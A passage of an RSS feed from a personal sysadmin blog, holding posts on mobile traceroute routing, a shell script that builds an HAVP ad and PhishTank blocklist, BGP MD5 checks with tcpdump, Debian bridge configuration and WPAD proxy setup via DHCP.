  4871. 10.|-- pos14-0-1.pascr4.paris.op  0.0%     4   61.0  64.4  57.7  78.5   9.5
  4872. 11.|-- ge6-0-0.br2.par2.alter.ne  0.0%     4   70.8  56.3  48.4  70.8   9.9
  4873. 12.|-- so-2-3-0.xt2.zur3.alter.n  0.0%     4  108.9  65.6  48.0 108.9  29.2
  4874. 13.|-- pos2-0.gw4.zur4.alter.net  0.0%     4   51.7  55.5  50.3  68.8   8.8
  4875. 14.|-- uch200193-gw.customer.alt  0.0%     4  171.8  83.6  50.7 171.8  58.8
  4876. 15.|-- whale29.open.ch            0.0%     4  132.1  90.0  59.2 132.1  32.7
  4877. 16.|-- orca8.open.ch              0.0%     4   72.4  66.8  58.6  73.5   7.3
  4878. 17.|-- real.jaggi.info           25.0%     4   80.2  64.7  56.2  80.2  13.4</pre>
  4879. <p>As we see, Orange injects their mobile data traffic into the Internet in Geneva (pos0-1-1-1.gencr1.geneve.).<br>
  4880. Then it is first sent to Paris (pas14-0-1.pascr4.paris.op and ge6-0-0.br2.par2.alter.ne) and from there back to Zurich (so-2-3-0.xt2.yur3.alter.n and all the following hosts).</p>
  4881. <p>I can kind of understand that the traffic is routed via Geneva (main Orange infrastructure is there), but why is it sent to Paris? (especially since Geneva&lt;-&gt;Zurich is the main Internet connection inside Switzerland where most of the countries fiber is buried).</p>
  4882. <p>I guess this explains why my mobile data speed is not always as fast as I like it to be...</p>
  4883. ]]></description>
  4884.    <content:encoded><![CDATA[<p>While in the train from Bern to Zurich, I did a traceroute towards the server which currently hosts this weblog (it is located at <a href="http://www.open.ch" title="Open Systems">Open Systems</a> in Zurich). The connection starts on my laptop and is thethered via my cell to the Orange backbone.</p>
  4885. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  4886.  1.|-- 172.20.10.1                0.0%     5    2.0  12.1   1.7  33.2  14.6
  4887.  2.|-- 10.8.8.67                  0.0%     5   52.2 373.4  52.2 1241. 504.8
  4888.  3.|-- 10.8.12.10                 0.0%     5   50.9 347.4  50.9 1143. 453.3
  4889.  4.|-- 192.168.249.201            0.0%     5   51.2 282.7  51.2 1042. 426.8
  4890.  5.|-- 192.168.253.191            0.0%     5   51.2 226.2  44.5 942.2 400.3
  4891.  6.|-- 192.168.250.203            0.0%     5   51.4 206.7  37.9 847.5 358.2
  4892.  7.|-- 10.10.10.10                0.0%     5   50.0 181.4  29.6 746.9 316.2
  4893.  8.|-- 10.255.200.1               0.0%     5   50.0 172.2  36.9 645.6 264.9
  4894.  9.|-- 193.251.248.145            0.0%     4   60.2  59.8  46.2  81.9  15.8
  4895. 10.|-- 193.251.240.53             0.0%     4   70.0  76.4  64.9 101.6  16.9
  4896. 11.|-- 146.188.112.77             0.0%     4   70.4  74.0  69.2  83.8   6.7
  4897. 12.|-- 146.188.5.1                0.0%     4   70.6  71.7  58.1  88.1  12.3
  4898. 13.|-- 146.188.4.194              0.0%     4   70.5  61.9  51.6  70.9  10.2
  4899. 14.|-- 146.188.64.74              0.0%     4   71.3  69.2  58.8  75.4   7.2
  4900. 15.|-- 213.156.230.29             0.0%     4   71.5  78.3  62.6 108.9  20.7
  4901. 16.|-- 213.156.229.8              0.0%     4   72.2  75.2  70.4  81.9   5.1
  4902. 17.|-- 213.156.229.222           25.0%     4   80.8  76.2  61.2  86.5  13.3</pre>
  4903. <p>You can see that the traffic is passed through 8 different routers inside the Orange backbone (using IPs from all three RFC1918 ranges...) before it is let onto the Internet.<br>
  4904. And then the real fun starts (let's use DNS names for this):</p>
  4905. <pre>HOST: Andreass-MacBook-Pro.local  Loss%   Snt   Last   Avg  Best  Wrst StDev
  4906.  1.|-- 172.20.10.1                0.0%     5    2.0  12.2   1.9  33.3  14.5
  4907.  2.|-- 10.8.8.67                  0.0%     5   44.2 345.6  27.0 1167. 494.2
  4908.  3.|-- 10.8.12.10                 0.0%     5   52.2 308.9  27.0 1104. 462.4
  4909.  4.|-- 192.168.249.201            0.0%     5   33.4 264.9  27.2 1014. 427.1
  4910.  5.|-- 192.168.253.191            0.0%     5   30.3 227.5  27.3 952.9 406.4
  4911.  6.|-- 192.168.250.203            0.0%     5   50.4 200.7  27.0 860.0 368.7
  4912.  7.|-- 10.10.10.10                0.0%     5   72.4 193.5  30.5 779.2 327.8
  4913.  8.|-- 10.255.200.1               0.0%     5   31.8 166.8  27.6 688.0 291.5
  4914.  9.|-- pos0-1-1-1.gencr1.geneve.  0.0%     4   50.8  55.0  47.6  67.1   8.6
  4915. 10.|-- pos14-0-1.pascr4.paris.op  0.0%     4   61.0  64.4  57.7  78.5   9.5
  4916. 11.|-- ge6-0-0.br2.par2.alter.ne  0.0%     4   70.8  56.3  48.4  70.8   9.9
  4917. 12.|-- so-2-3-0.xt2.zur3.alter.n  0.0%     4  108.9  65.6  48.0 108.9  29.2
  4918. 13.|-- pos2-0.gw4.zur4.alter.net  0.0%     4   51.7  55.5  50.3  68.8   8.8
  4919. 14.|-- uch200193-gw.customer.alt  0.0%     4  171.8  83.6  50.7 171.8  58.8
  4920. 15.|-- whale29.open.ch            0.0%     4  132.1  90.0  59.2 132.1  32.7
  4921. 16.|-- orca8.open.ch              0.0%     4   72.4  66.8  58.6  73.5   7.3
  4922. 17.|-- real.jaggi.info           25.0%     4   80.2  64.7  56.2  80.2  13.4</pre>
  4923. <p>As we see, Orange injects their mobile data traffic into the Internet in Geneva (pos0-1-1-1.gencr1.geneve.).<br>
  4924. Then it is first sent to Paris (pas14-0-1.pascr4.paris.op and ge6-0-0.br2.par2.alter.ne) and from there back to Zurich (so-2-3-0.xt2.yur3.alter.n and all the following hosts).</p>
  4925. <p>I can kind of understand that the traffic is routed via Geneva (main Orange infrastructure is there), but why is it sent to Paris? (especially since Geneva&lt;-&gt;Zurich is the main Internet connection inside Switzerland where most of the countries fiber is buried).</p>
  4926. <p>I guess this explains why my mobile data speed is not always as fast as I like it to be...</p>
  4927. ]]></content:encoded>
  4928.  </item>
  4929.  
  4930.  <item>
  4931.    <title>Administrative Distance</title>
  4932.    <link>https://blog.x-way.org/Networking/2013/02/18/Administrative-Distance.html</link>
  4933.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324198</guid>
  4934.    <dc:creator>Andreas Jaggi</dc:creator>
  4935.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4936.    <pubDate>Mon, 18 Feb 2013 08:39:00 +0000</pubDate>
  4937.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4938.    <description><![CDATA[<p>When using more than one dynamic routing protocol, make sure to know their <a href="http://en.wikipedia.org/wiki/Administrative_distance" title="Administrative distance">administrative distance</a>.</p>
  4939. <p>Further it is usually a bad idea to redistribute routes from a dynamic routing protocol into another one with a lower administrative distance. Especially when having multiple handover points between the two protocols.</p>
  4940. ]]></description>
  4941.    <content:encoded><![CDATA[<p>When using more than one dynamic routing protocol, make sure to know their <a href="http://en.wikipedia.org/wiki/Administrative_distance" title="Administrative distance">administrative distance</a>.</p>
  4942. <p>Further it is usually a bad idea to redistribute routes from a dynamic routing protocol into another one with a lower administrative distance. Especially when having multiple handover points between the two protocols.</p>
  4943. ]]></content:encoded>
  4944.  </item>
  4945.  
  4946.  <item>
  4947.    <title>I ♡ snow</title>
  4948.    <link>https://blog.x-way.org/Misc/2013/02/17/I-love-snow.html</link>
  4949.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324197</guid>
  4950.    <dc:creator>Andreas Jaggi</dc:creator>
  4951.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4952.    <pubDate>Sun, 17 Feb 2013 17:31:00 +0000</pubDate>
  4953.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  4954.    <description><![CDATA[<p><a href="https://blog.x-way.org/images/i-love-snow-full.jpg" title="I ♡ snow"><img alt="I love snow" src="https://blog.x-way.org/images/i-love-snow.jpg" height="164" width="507" title="I ♡ snow"></a></p>
  4955. ]]></description>
  4956.    <content:encoded><![CDATA[<p><a href="https://blog.x-way.org/images/i-love-snow-full.jpg" title="I ♡ snow"><img alt="I love snow" src="https://blog.x-way.org/images/i-love-snow.jpg" height="164" width="507" title="I ♡ snow"></a></p>
  4957. ]]></content:encoded>
  4958.  </item>
  4959.  
  4960.  <item>
  4961.    <title>Computer Science</title>
  4962.    <link>https://blog.x-way.org/Misc/2013/02/14/Computer-Science.html</link>
  4963.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324196</guid>
  4964.    <dc:creator>Andreas Jaggi</dc:creator>
  4965.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4966.    <pubDate>Thu, 14 Feb 2013 18:07:00 +0000</pubDate>
  4967.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  4968.    <description><![CDATA[<p><img src="https://blog.x-way.org/images/comp-sci.jpg" height="371" width="497" alt="Computer Science"><br>via <a href="http://boingboing.net/2013/02/14/photo-of-the-computer-science.html" title="Photo of the Computer Science section at Barnes and Noble">boingboing.net</a></p>
  4969. ]]></description>
  4970.    <content:encoded><![CDATA[<p><img src="https://blog.x-way.org/images/comp-sci.jpg" height="371" width="497" alt="Computer Science"><br>via <a href="http://boingboing.net/2013/02/14/photo-of-the-computer-science.html" title="Photo of the Computer Science section at Barnes and Noble">boingboing.net</a></p>
  4971. ]]></content:encoded>
  4972.  </item>
  4973.  
  4974.  <item>
  4975.    <title>Updated HAVP blacklist script</title>
  4976.    <link>https://blog.x-way.org/Linux/2013/02/13/Updated-HAVP-blacklist-script.html</link>
  4977.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324195</guid>
  4978.    <dc:creator>Andreas Jaggi</dc:creator>
  4979.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4980.    <pubDate>Wed, 13 Feb 2013 18:02:00 +0000</pubDate>
  4981.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  4982.    <description><![CDATA[<p>The <a href="http://waterwave.ch/weblog/detail.php?id=324191">HAVP blacklist script</a> chocked on some entries from <a href="http://www.phishtank.com/" title="PhishTank">PhishTank</a>. These issues have been fixed with some more sed magic and I've put and updated version of the script on <a href="https://gist.github.com/x-way/4945994" title="makeblacklist.sh">Github</a>.</p>
  4983. <script src="https://gist.github.com/x-way/4945994.js"></script>
  4984. ]]></description>
  4985.    <content:encoded><![CDATA[<p>The <a href="http://waterwave.ch/weblog/detail.php?id=324191">HAVP blacklist script</a> chocked on some entries from <a href="http://www.phishtank.com/" title="PhishTank">PhishTank</a>. These issues have been fixed with some more sed magic and I've put and updated version of the script on <a href="https://gist.github.com/x-way/4945994" title="makeblacklist.sh">Github</a>.</p>
  4986. <script src="https://gist.github.com/x-way/4945994.js"></script>
  4987. ]]></content:encoded>
  4988.  </item>
  4989.  
  4990.  <item>
  4991.    <title>Verify a BGP MD5 password before session turnup</title>
  4992.    <link>https://blog.x-way.org/Networking/2013/02/13/Verify-a-BGP-MD5-password-before-session-turnup.html</link>
  4993.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324194</guid>
  4994.    <dc:creator>Andreas Jaggi</dc:creator>
  4995.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  4996.    <pubDate>Wed, 13 Feb 2013 09:02:00 +0000</pubDate>
  4997.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  4998.    <description><![CDATA[<p>When setting up a new BGP peering, you may want to test if your peering partner uses the correct MD5 password without bringing up your side of the session.<br>
  4999. For this the <a href="http://www.tcpdump.org" title="TCPDUMP">tcpdump</a> option <var>-M</var> can be used to supply the MD5 password when sniffing the traffic of the new peer:</p>
  5000. <pre>tcpdump -ni eth0 -M MyBgPMd5PaSsWoRd tcp port 179</pre>
  5001. <p>tcpdump will then verify the MD5 signature for every packet where it finds a MD5 signature TCP option as specified in <a href="https://tools.ietf.org/html/rfc2385" title="RFC2385">RFC2385</a>.
  5002. <br>
  5003. In the output you will see <var>md5valid</var> for packets where your password matches the MD5 signature or <var>md5invalid</var> for packets where your password does not match the MD5 signature.<br>If you see neither <var>md5valid</var> nor <var>md5invalid</var> then the peer did not configure any MD5 BGP password.</p>
  5004. <p>If you want to check for mismatching MD5 passwords after you bring up the BGP session, just look into the kernel log. Linux reports invalid MD5 TCP signatures like this:</p>
  5005. <pre>MD5 Hash failed for (1.2.3.4, 56789)-&gt;(1.2.3.5, 179)</pre>
  5006. ]]></description>
  5007.    <content:encoded><![CDATA[<p>When setting up a new BGP peering, you may want to test if your peering partner uses the correct MD5 password without bringing up your side of the session.<br>
  5008. For this the <a href="http://www.tcpdump.org" title="TCPDUMP">tcpdump</a> option <var>-M</var> can be used to supply the MD5 password when sniffing the traffic of the new peer:</p>
  5009. <pre>tcpdump -ni eth0 -M MyBgPMd5PaSsWoRd tcp port 179</pre>
  5010. <p>tcpdump will then verify the MD5 signature for every packet where it finds a MD5 signature TCP option as specified in <a href="https://tools.ietf.org/html/rfc2385" title="RFC2385">RFC2385</a>.
  5011. <br>
  5012. In the output you will see <var>md5valid</var> for packets where your password matches the MD5 signature or <var>md5invalid</var> for packets where your password does not match the MD5 signature.<br>If you see neither <var>md5valid</var> nor <var>md5invalid</var> then the peer did not configure any MD5 BGP password.</p>
  5013. <p>If you want to check for mismatching MD5 passwords after you bring up the BGP session, just look into the kernel log. Linux reports invalid MD5 TCP signatures like this:</p>
  5014. <pre>MD5 Hash failed for (1.2.3.4, 56789)-&gt;(1.2.3.5, 179)</pre>
  5015. ]]></content:encoded>
  5016.  </item>
  5017.  
  5018.  <item>
  5019.    <title>Configure unattached Bridge Interfaces in Debian</title>
  5020.    <link>https://blog.x-way.org/Linux/2013/02/05/Configure-unattached-Bridge-Interfaces-in-Debian.html</link>
  5021.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324193</guid>
  5022.    <dc:creator>Andreas Jaggi</dc:creator>
  5023.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5024.    <pubDate>Tue, 05 Feb 2013 08:42:00 +0000</pubDate>
  5025.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  5026.    <description><![CDATA[<p>When working with virtualization technologies like KVM on Debian, you might need to configure bridge interfaces which are not attached to a physical interfaces (for example for a non-routed management network or similar).<br>
  5027. Debian uses the directive <var>bridge_ports</var> in <var>/etc/network/interfaces</var> to indicate whether an interface is a bridge interface or not.
  5028. The syntax checker does not accept an empty <var>bridge_ports</var> directive since he expects a list of physical interfaces to attach to the bridge interface.</p>
  5029. <p>When needing a bridge interface without any physical interfaces attached, usually people configure this interface by hand or with a special script.<br>
  5030. Since I manage <var>/etc/network/interfaces</var> with <a href="https://github.com/x-way/puppet-interfaces" title="puppet-interfaces">my Puppet module</a>, I would like to use it to configure all network interfaces including the unattached bridge interfaces.<br>
  5031. It turns out that this can be done by passing <var>none</var> as parameter for the <var>bridge_ports</var> directive like this:
  5032. </p>
  5033. <pre>interface br0 inet static
  5034. address 192.0.2.1
  5035. netmask 255.255.255.0
  5036. bridge_ports none</pre>
  5037. ]]></description>
  5038.    <content:encoded><![CDATA[<p>When working with virtualization technologies like KVM on Debian, you might need to configure bridge interfaces which are not attached to a physical interfaces (for example for a non-routed management network or similar).<br>
  5039. Debian uses the directive <var>bridge_ports</var> in <var>/etc/network/interfaces</var> to indicate whether an interface is a bridge interface or not.
  5040. The syntax checker does not accept an empty <var>bridge_ports</var> directive since he expects a list of physical interfaces to attach to the bridge interface.</p>
  5041. <p>When needing a bridge interface without any physical interfaces attached, usually people configure this interface by hand or with a special script.<br>
  5042. Since I manage <var>/etc/network/interfaces</var> with <a href="https://github.com/x-way/puppet-interfaces" title="puppet-interfaces">my Puppet module</a>, I would like to use it to configure all network interfaces including the unattached bridge interfaces.<br>
  5043. It turns out that this can be done by passing <var>none</var> as parameter for the <var>bridge_ports</var> directive like this:
  5044. </p>
  5045. <pre>interface br0 inet static
  5046. address 192.0.2.1
  5047. netmask 255.255.255.0
  5048. bridge_ports none</pre>
  5049. ]]></content:encoded>
  5050.  </item>
  5051.  
  5052.  <item>
  5053.    <title>Nice-looking templates for HAVP</title>
  5054.    <link>https://blog.x-way.org/Linux/2013/01/05/Nice-looking-templates-for-HAVP.html</link>
  5055.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324192</guid>
  5056.    <dc:creator>Andreas Jaggi</dc:creator>
  5057.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5058.    <pubDate>Sat, 05 Jan 2013 00:14:00 +0000</pubDate>
  5059.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  5060.    <description><![CDATA[<p>Since the default templates of HAVP look like being stuck in the 90's, I created some nice-looking templates.<br>
  5061. You can download them from GitHub: <a href="https://github.com/x-way/havp-templates" title="x-way/havp-templates">https://github.com/x-way/havp-templates</a><br>Currently there is only the german version, feel free to send me a pull-request with another translation :-)</p>
  5062. <p><a href="https://blog.x-way.org/images/havp-templates-screenshot.png"><img src="https://blog.x-way.org/images/havp-templates-thumb.png" alt="havp-templates screenshot" width="306" height="116"></a></p>
  5063. ]]></description>
  5064.    <content:encoded><![CDATA[<p>Since the default templates of HAVP look like being stuck in the 90's, I created some nice-looking templates.<br>
  5065. You can download them from GitHub: <a href="https://github.com/x-way/havp-templates" title="x-way/havp-templates">https://github.com/x-way/havp-templates</a><br>Currently there is only the german version, feel free to send me a pull-request with another translation :-)</p>
  5066. <p><a href="https://blog.x-way.org/images/havp-templates-screenshot.png"><img src="https://blog.x-way.org/images/havp-templates-thumb.png" alt="havp-templates screenshot" width="306" height="116"></a></p>
  5067. ]]></content:encoded>
  5068.  </item>
  5069.  
  5070.  <item>
  5071.    <title>HAVP PhishTank and Adserver Blacklist</title>
  5072.    <link>https://blog.x-way.org/Linux/2013/01/01/HAVP-PhishTank-and-Adserver-Blacklist.html</link>
  5073.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324191</guid>
  5074.    <dc:creator>Andreas Jaggi</dc:creator>
  5075.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5076.    <pubDate>Tue, 01 Jan 2013 12:50:00 +0000</pubDate>
  5077.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  5078.    <description><![CDATA[<p>For basic virus protection I'm running a proxy with <a href="http://www.server-side.de/" title="HTTP Anti-Virus Proxy">HAVP</a> and <a href="http://www.clamav.net/" title="Clam AntiVirus">ClamAV</a>.<br>
  5079. Since some time I was using HAVPs blacklist functionality to block Ads (by blacklisting *.doubleclick.net and *.ivwbox.de).
  5080. As such a manual blacklist is not very efficient I wanted to have an auto-updating list of adservers, thus I started to write the shellscript below which generates an up-to-date blacklist based on the adserverlist from <a href="http://pgl.yoyo.org/adservers/" title="pgl.yoyo.org">pgl.yoyo.org</a>.</p>
  5081. <p>Shortly after this I extended the script to also incorporate a Phising blacklist based on the data from <a href="http://www.phishtank.com/" title="PhishTank">PhishTank</a>.<br>
  5082. Currently I'm using the version below which runs in a cronjob every two hours and keeps the HAVP blacklist up-to-date. Please note that you need to insert your own free PhishTank API key when using this script.</p>
  5083. <pre>
  5084. #!/bin/sh
  5085.  
  5086. cd /etc/havp
  5087.  
  5088. OUTFILE=/etc/havp/blacklist
  5089.  
  5090. ADSERVERLIST=/etc/havp/adserverlist
  5091. PHISHTANK=/etc/havp/phishtank
  5092. MYBLACKLIST=/etc/havp/myblacklist
  5093.  
  5094. wget -q -N "http://pgl.yoyo.org/adservers/serverlist.php?hostformat=webwasher;showintro=0;mimetype=plaintext"
  5095. sed -e 's_^//_#_g' serverlist.php* | sort | uniq &gt; $ADSERVERLIST
  5096.  
  5097. wget -q -N http://data.phishtank.com/data/&lt;PhishTank API key&gt;/online-valid.csv.bz2
  5098. bzcat online-valid.csv.bz2 | sed \
  5099. -e 's/^[0-9]*,//' \
  5100. -e 's@,http://www.phishtank.com/phish_detail.php?phish_id=[0-9]*,.*$@@' \
  5101. -e 's/^"\(.*\)"$/\1/'  \
  5102. -e 's_^https\?://__' \
  5103. -e 's_/$_/*_' \
  5104. -e 's_^\([^/]*\)$_\1/*_' \
  5105. -e 's/?.*/*/' | \
  5106. grep -vF 'phish_id,url,phish_detail_url,submission_time,verified,verification_time,online,target' | \
  5107. iconv -f utf8 -t ascii -c - | sort | uniq &gt; $PHISHTANK
  5108.  
  5109.  
  5110. echo "# blacklist file generated by $0, `date`" &gt; $OUTFILE
  5111.  
  5112. echo "\n# MYBLACKLIST:" &gt;&gt; $OUTFILE
  5113. cat $MYBLACKLIST &gt;&gt; $OUTFILE
  5114.  
  5115. echo "\n# ADSERVERLIST:" &gt;&gt; $OUTFILE
  5116. cat $ADSERVERLIST &gt;&gt; $OUTFILE
  5117.  
  5118. echo "\n# PHISHTANK:" &gt;&gt; $OUTFILE
  5119. cat $PHISHTANK &gt;&gt; $OUTFILE
  5120. </pre>
  5121. ]]></description>
  5122.    <content:encoded><![CDATA[<p>For basic virus protection I'm running a proxy with <a href="http://www.server-side.de/" title="HTTP Anti-Virus Proxy">HAVP</a> and <a href="http://www.clamav.net/" title="Clam AntiVirus">ClamAV</a>.<br>
  5123. Since some time I was using HAVPs blacklist functionality to block Ads (by blacklisting *.doubleclick.net and *.ivwbox.de).
  5124. As such a manual blacklist is not very efficient I wanted to have an auto-updating list of adservers, thus I started to write the shellscript below which generates an up-to-date blacklist based on the adserverlist from <a href="http://pgl.yoyo.org/adservers/" title="pgl.yoyo.org">pgl.yoyo.org</a>.</p>
  5125. <p>Shortly after this I extended the script to also incorporate a Phising blacklist based on the data from <a href="http://www.phishtank.com/" title="PhishTank">PhishTank</a>.<br>
  5126. Currently I'm using the version below which runs in a cronjob every two hours and keeps the HAVP blacklist up-to-date. Please note that you need to insert your own free PhishTank API key when using this script.</p>
  5127. <pre>
  5128. #!/bin/sh
  5129.  
  5130. cd /etc/havp
  5131.  
  5132. OUTFILE=/etc/havp/blacklist
  5133.  
  5134. ADSERVERLIST=/etc/havp/adserverlist
  5135. PHISHTANK=/etc/havp/phishtank
  5136. MYBLACKLIST=/etc/havp/myblacklist
  5137.  
  5138. wget -q -N "http://pgl.yoyo.org/adservers/serverlist.php?hostformat=webwasher;showintro=0;mimetype=plaintext"
  5139. sed -e 's_^//_#_g' serverlist.php* | sort | uniq &gt; $ADSERVERLIST
  5140.  
  5141. wget -q -N http://data.phishtank.com/data/&lt;PhishTank API key&gt;/online-valid.csv.bz2
  5142. bzcat online-valid.csv.bz2 | sed \
  5143. -e 's/^[0-9]*,//' \
  5144. -e 's@,http://www.phishtank.com/phish_detail.php?phish_id=[0-9]*,.*$@@' \
  5145. -e 's/^"\(.*\)"$/\1/'  \
  5146. -e 's_^https\?://__' \
  5147. -e 's_/$_/*_' \
  5148. -e 's_^\([^/]*\)$_\1/*_' \
  5149. -e 's/?.*/*/' | \
  5150. grep -vF 'phish_id,url,phish_detail_url,submission_time,verified,verification_time,online,target' | \
  5151. iconv -f utf8 -t ascii -c - | sort | uniq &gt; $PHISHTANK
  5152.  
  5153.  
  5154. echo "# blacklist file generated by $0, `date`" &gt; $OUTFILE
  5155.  
  5156. echo "\n# MYBLACKLIST:" &gt;&gt; $OUTFILE
  5157. cat $MYBLACKLIST &gt;&gt; $OUTFILE
  5158.  
  5159. echo "\n# ADSERVERLIST:" &gt;&gt; $OUTFILE
  5160. cat $ADSERVERLIST &gt;&gt; $OUTFILE
  5161.  
  5162. echo "\n# PHISHTANK:" &gt;&gt; $OUTFILE
  5163. cat $PHISHTANK &gt;&gt; $OUTFILE
  5164. </pre>
  5165. ]]></content:encoded>
  5166.  </item>
  5167.  
  5168.  <item>
  5169.    <title>Automatic Proxy Configuration via DHCP</title>
  5170.    <link>https://blog.x-way.org/Networking/2012/12/30/Automatic-Proxy-Configuration-via-DHCP.html</link>
  5171.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324190</guid>
  5172.    <dc:creator>Andreas Jaggi</dc:creator>
  5173.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5174.    <pubDate>Sun, 30 Dec 2012 19:39:00 +0000</pubDate>
  5175.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  5176.    <description><![CDATA[<p>To avoid the timeconsuming manual configuration of a proxy server on all computers, phones and tablets, the proxy configuration can be provided automatically via DHCP by using <a href="http://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol" title="Web Proxy Autodiscovery Protocol">WPAD</a>.</p>
  5177. <p>For this setup, the following components are needed:</p>
  5178. <ol>
  5179. <li>A DHCP server which announces DHCP option 252 with the URL of the <a href="http://en.wikipedia.org/wiki/Proxy_auto-config" title="Proxy auto config">PAC</a> file (wpad.dat).</li>
  5180. <li>A webserver which serves the wpad.dat file</li>
  5181. <li>A wpad.dat PAC file where the Proxy IP is defined</li>
  5182. </ol>
  5183.  
  5184. <p>On a MikroTik system, the DHCP server configuration looks like this:</p>
  5185. <pre>
  5186. /ip dhcp-server option
  5187. add code=252 name=local-pac-server value="http://192.168.0.2:80/wpad.dat\?"
  5188. /ip dhcp-server network
  5189. add address=192.168.0.0/24 dhcp-option=local-pac-server dns-server=192.168.0.1 gateway=192.168.0.1 netmask=24
  5190. </pre>
  5191. <p>Please note the trailing questionmark in the URL for the PAC file. This is a workaround for yet another occurrence of RFC nitpicking where some implementations might misinterpret the DHCP option and add an encoded NULL-byte character to the end of the URL when requesting the PAC file from the webserver.<br>With the questinmark at the end of the URL, any additional trailing NULL-byte character will be ignored by the webserver and the PAC file will be loaded just fine.</p>
  5192.  
  5193. <p>Following the example above, on the machine 192.168.0.2, we serve the following <var>wpad.dat</var> file:</p>
  5194. <pre>
  5195. function FindProxyForURL ( url, host ) {
  5196. return "PROXY 1.2.3.4:8080; DIRECT";
  5197. }
  5198. </pre>
  5199.  
  5200. <p>With this setup, all systems will use the proxy at 1.2.3.4 and if the proxy is not available try to connect directly to the Internet.<br>
  5201. While this is fine for a home network where the proxy is mostly used for adblocking, you probably want to remove the <var>DIRECT</var> part in an enterprise setup.</p>
  5202. ]]></description>
  5203.    <content:encoded><![CDATA[<p>To avoid the timeconsuming manual configuration of a proxy server on all computers, phones and tablets, the proxy configuration can be provided automatically via DHCP by using <a href="http://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol" title="Web Proxy Autodiscovery Protocol">WPAD</a>.</p>
  5204. <p>For this setup, the following components are needed:</p>
  5205. <ol>
  5206. <li>A DHCP server which announces DHCP option 252 with the URL of the <a href="http://en.wikipedia.org/wiki/Proxy_auto-config" title="Proxy auto config">PAC</a> file (wpad.dat).</li>
  5207. <li>A webserver which serves the wpad.dat file</li>
  5208. <li>A wpad.dat PAC file where the Proxy IP is defined</li>
  5209. </ol>
  5210.  
  5211. <p>On a MikroTik system, the DHCP server configuration looks like this:</p>
  5212. <pre>
  5213. /ip dhcp-server option
  5214. add code=252 name=local-pac-server value="http://192.168.0.2:80/wpad.dat\?"
  5215. /ip dhcp-server network
  5216. add address=192.168.0.0/24 dhcp-option=local-pac-server dns-server=192.168.0.1 gateway=192.168.0.1 netmask=24
  5217. </pre>
  5218. <p>Please note the trailing questionmark in the URL for the PAC file. This is a workaround for yet another occurrence of RFC nitpicking where some implementations might misinterpret the DHCP option and add an encoded NULL-byte character to the end of the URL when requesting the PAC file from the webserver.<br>With the questinmark at the end of the URL, any additional trailing NULL-byte character will be ignored by the webserver and the PAC file will be loaded just fine.</p>
  5219.  
  5220. <p>Following the example above, on the machine 192.168.0.2, we serve the following <var>wpad.dat</var> file:</p>
  5221. <pre>
  5222. function FindProxyForURL ( url, host ) {
  5223. return "PROXY 1.2.3.4:8080; DIRECT";
  5224. }
  5225. </pre>
  5226.  
  5227. <p>With this setup, all systems will use the proxy at 1.2.3.4 and if the proxy is not available try to connect directly to the Internet.<br>
  5228. While this is fine for a home network where the proxy is mostly used for adblocking, you probably want to remove the <var>DIRECT</var> part in an enterprise setup.</p>
  5229. ]]></content:encoded>
  5230.  </item>
  5231.  
  5232.  <item>
  5233.    <title>Stripe CTF 2.0</title>
  5234.    <link>https://blog.x-way.org/Networking/2012/08/28/Stripe-CTF-2.0.html</link>
  5235.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324189</guid>
  5236.    <dc:creator>Andreas Jaggi</dc:creator>
  5237.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  5238.    <pubDate>Tue, 28 Aug 2012 11:23:00 +0000</pubDate>
  5239.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  5240.    <description><![CDATA[<p><a href="#" class="gone" title="Stripe: Capture The Flag"><img src="https://blog.x-way.org/images/stripe-ctf.png" height="274" width="387" alt="Stripe: Capture The Flag"></a></p>
  5241. ]]></description>
  5242.    <content:encoded><![CDATA[<p><a href="#" class="gone" title="Stripe: Capture The Flag"><img src="https://blog.x-way.org/images/stripe-ctf.png" height="274" width="387" alt="Stripe: Capture The Flag"></a></p>
  5243. ]]></content:encoded>
  5244.  </item>
  5245.  
  5246.  <item>
  5247.    <title>icanhazip.com clone with nginx</title>
  5248.    <link>https://blog.x-way.org/Linux/2012/08/05/icanhazip.com-clone-with-nginx.html</link>
  5249.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324188</guid>
  5250.    <dc:creator>Andreas Jaggi</dc:creator>
  5251.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
